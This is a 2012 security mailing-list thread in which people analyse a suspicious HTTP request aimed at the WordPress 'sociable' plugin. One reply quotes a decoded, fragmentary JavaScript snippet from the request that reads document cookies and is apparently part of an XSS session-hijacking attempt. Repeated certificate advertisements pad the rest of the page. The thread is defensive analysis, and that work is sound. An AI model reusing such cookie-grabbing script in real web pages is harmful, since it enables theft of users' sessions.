Security Basics mailing list archives
Re: Weird HTTP request
From: Andre Silaghi <andre.silaghi () googlemail com>
Date: Fri, 06 Apr 2012 09:58:46 +0200
if we can trust the folder structure it is wordpress, as some of you already said. it also seems that it is an attack on a plugin which is this one: http://wordpress.org/extend/plugins/sociable/ the code seems to try to hijack a users' session. hope it helps and it's correct but tell me if i'm wrong with this. best rgds, andre s. Am 05.04.2012 18:24, schrieb E M:
H guys I have seen a similar code on my WAF being detected as XSS attack. But further investigation proved it was false positive. In fact the code is an AJAX code. Ajax code has JS code in URL. Just thought might help :D On 4/5/12, Patrick Laverty <patrick_laverty () brown edu> wrote:Jerome- Looks like some bad stuff like xss. Changing the encoding, I get things like below. I'm a beginner so I can't tell you anything in depth, but it looks like it's trying to grab cookies and play with a timer on the site? If the request is working, check with the plugin's author and see what they know about this? http://www.domain.com/wp-content/plugins/sociable-30/addtofadexOf(c_name + "="); if (c_start!=-1) | c_start=c_start + c_name.length+1; c_end=document.cookie.indexOf(";",c_start); if (c_end==-1) c_end=document.cookie.length; return unescape(document.cookie.substring(c_start,c_end)); ------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------
------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------
Current thread:
- Weird HTTP request J M (Apr 05)
- Re: Weird HTTP request Pierre Jaury (Apr 05)
- Re: Weird HTTP request Patrick Laverty (Apr 05)
- Re: Weird HTTP request E M (Apr 05)
- Re: Weird HTTP request Andre Silaghi (Apr 09)
- Re: Weird HTTP request E M (Apr 05)
- Re: Weird HTTP request Stephanus J Alex Taidri (Apr 05)
- Re: Weird HTTP request Henri Salo (Apr 09)
- <Possible follow-ups>
- Re: Weird HTTP request Alexander Meesters (Apr 09)